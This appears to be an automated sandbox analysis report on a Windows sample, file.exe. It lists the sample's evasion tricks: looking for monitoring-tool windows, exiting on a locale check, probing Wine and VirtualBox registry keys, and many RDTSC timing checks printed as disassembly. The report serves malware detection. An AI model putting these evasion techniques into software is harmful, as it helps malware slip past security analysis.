Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58385

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1FF6 second address: 7A184E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F02BCD63870h 0x00000011 push dword ptr [ebp+122D1335h] 0x00000017 jmp 00007F02BCD63876h 0x0000001c jmp 00007F02BCD63872h 0x00000021 call dword ptr [ebp+122D1CE7h] 0x00000027 pushad 0x00000028 pushad 0x00000029 sub dword ptr [ebp+122D1B79h], edx 0x0000002f mov dword ptr [ebp+122D1B79h], edx 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 jnl 00007F02BCD6386Ch 0x0000003e sub dword ptr [ebp+122D1B79h], eax 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 jbe 00007F02BCD6386Ch 0x0000004e mov dword ptr [ebp+122D1BA0h], esi 0x00000054 mov dword ptr [ebp+122D1BA0h], ebx 0x0000005a mov dword ptr [ebp+122D3461h], eax 0x00000060 or dword ptr [ebp+122D1BA0h], esi 0x00000066 mov esi, 0000003Ch 0x0000006b jbe 00007F02BCD63873h 0x00000071 jmp 00007F02BCD6386Dh 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D1BA0h], ecx 0x00000080 lodsw 0x00000082 pushad 0x00000083 call 00007F02BCD6386Bh 0x00000088 cmc 0x00000089 pop ebx 0x0000008a adc ax, FEB6h 0x0000008f popad 0x00000090 add eax, dword ptr [esp+24h] 0x00000094 sub dword ptr [ebp+122D1B89h], ecx 0x0000009a mov ebx, dword ptr [esp+24h] 0x0000009e clc 0x0000009f nop 0x000000a0 pushad 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 jmp 00007F02BCD63877h 0x000000a8 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A184E second address: 7A186C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F02BD1AD2F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A186C second address: 7A1879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1879 second address: 7A187D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924549 second address: 92454D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92454D second address: 92455F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jc 00007F02BD1AD2E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9246AF second address: 9246B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9246B8 second address: 9246C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F02BD1AD2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9246C2 second address: 9246CC instructions: 0x00000000 rdtsc 0x00000002 je 00007F02BCD63866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924C40 second address: 924C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924C46 second address: 924C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924D84 second address: 924D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924D9B second address: 924DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F02BCD63866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DAB second address: 924DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DAF second address: 924DBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DBD second address: 924DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924DD0 second address: 924DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92677E second address: 926782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926782 second address: 926788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926788 second address: 926820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jno 00007F02BD1AD2FFh 0x00000011 pop esi 0x00000012 nop 0x00000013 jmp 00007F02BD1AD2F7h 0x00000018 mov edx, esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F02BD1AD2E8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 call 00007F02BD1AD2E9h 0x0000003b jmp 00007F02BD1AD2F9h 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926820 second address: 926824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926824 second address: 92682D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92682D second address: 926841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F02BCD63866h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926841 second address: 926847 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926847 second address: 926865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926865 second address: 9268E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007F02BD1AD2E6h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jnl 00007F02BD1AD2EEh 0x00000019 pop eax 0x0000001a mov ecx, 3A1B6810h 0x0000001f push 00000003h 0x00000021 and edx, dword ptr [ebp+122D3661h] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F02BD1AD2E8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2F33h], esi 0x00000049 push 00000003h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F02BD1AD2E8h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 0000001Ah 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 mov cl, 21h 0x00000067 push 8496F77Ah 0x0000006c pushad 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9268E7 second address: 9268FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F02BCD63866h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02BCD6386Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9268FF second address: 92695D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02BD1AD2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3B690886h 0x00000012 lea ebx, dword ptr [ebp+12458677h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F02BD1AD2E8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 pushad 0x00000033 xor bl, 00000075h 0x00000036 mov ecx, edx 0x00000038 popad 0x00000039 sub dword ptr [ebp+122D1FF1h], edi 0x0000003f xor di, 577Fh 0x00000044 xchg eax, ebx 0x00000045 push edx 0x00000046 jmp 00007F02BD1AD2EBh 0x0000004b pop edx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92695D second address: 926964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926A91 second address: 926A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926A95 second address: 926AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F02BCD6386Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926AB1 second address: 926AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02BD1AD2F8h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F02BD1AD2F0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926AE7 second address: 926AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926AEB second address: 926AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926BB2 second address: 926BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926BB6 second address: 926BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a and edx, 64504CC4h 0x00000010 mov dword ptr [ebp+122D2F0Dh], esi 0x00000016 push 00000000h 0x00000018 clc 0x00000019 call 00007F02BD1AD2E9h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007F02BD1AD2E6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926BE2 second address: 926BE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926BE8 second address: 926C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F02BD1AD2ECh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F02BD1AD2EAh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F02BD1AD2F2h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007F02BD1AD2E6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926C2C second address: 926C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926C30 second address: 926CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F02BD1AD2E8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 sub cx, 4DA6h 0x00000027 push 00000003h 0x00000029 add dword ptr [ebp+122D2F33h], ebx 0x0000002f xor edi, dword ptr [ebp+122D2D57h] 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D1E9Eh] 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F02BD1AD2E8h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 jc 00007F02BD1AD2EBh 0x0000005f mov edx, 2167DDC9h 0x00000064 call 00007F02BD1AD2E9h 0x00000069 jne 00007F02BD1AD2F0h 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jg 00007F02BD1AD2E6h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926CCB second address: 926D48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F02BCD6386Dh 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jg 00007F02BCD63868h 0x0000001c pushad 0x0000001d js 00007F02BCD63866h 0x00000023 jmp 00007F02BCD63876h 0x00000028 popad 0x00000029 popad 0x0000002a mov eax, dword ptr [eax] 0x0000002c jl 00007F02BCD63887h 0x00000032 pushad 0x00000033 jmp 00007F02BCD63879h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926D48 second address: 926D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F02BD1AD2EDh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926D64 second address: 926DFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F02BCD63879h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F02BCD6386Bh 0x00000011 lea ebx, dword ptr [ebp+1245868Bh] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F02BCD63868h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 push ecx 0x00000032 call 00007F02BCD63875h 0x00000037 jmp 00007F02BCD6386Ch 0x0000003c pop edx 0x0000003d pop esi 0x0000003e xchg eax, ebx 0x0000003f jmp 00007F02BCD63877h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jno 00007F02BCD63866h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948AFD second address: 948B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946AF0 second address: 946B01 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007F02BCD63866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946B01 second address: 946B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946C75 second address: 946C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946C79 second address: 946C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946C98 second address: 946CB6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F02BCD63875h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470E1 second address: 9470F6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F02BD1AD2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jp 00007F02BD1AD2FAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470F6 second address: 9470FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470FA second address: 947100 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94724F second address: 947254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94766A second address: 947681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F02BD1AD2EEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947681 second address: 9476A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F02BCD6386Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F02BCD6386Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B643 second address: 93B65B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F02BD1AD2F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B65B second address: 93B661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948359 second address: 94837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F02BD1AD2E6h 0x0000000a pop ebx 0x0000000b jmp 00007F02BD1AD2F8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94837C second address: 948382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B653 second address: 93B65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94892E second address: 948932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948932 second address: 948942 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F02BD1AD2E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948942 second address: 948968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD6386Bh 0x00000007 jmp 00007F02BCD63874h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948968 second address: 948986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2EBh 0x00000009 jbe 00007F02BD1AD2E6h 0x0000000f popad 0x00000010 jg 00007F02BD1AD2ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94DB5B second address: 94DB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94DCDF second address: 94DD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2EFh 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F02BD1AD2F6h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94DD14 second address: 94DD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94C4B8 second address: 94C4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9539E1 second address: 9539E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9539E5 second address: 953A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 jne 00007F02BD1AD2E6h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c jno 00007F02BD1AD2E6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953A07 second address: 953A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953A0B second address: 953A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
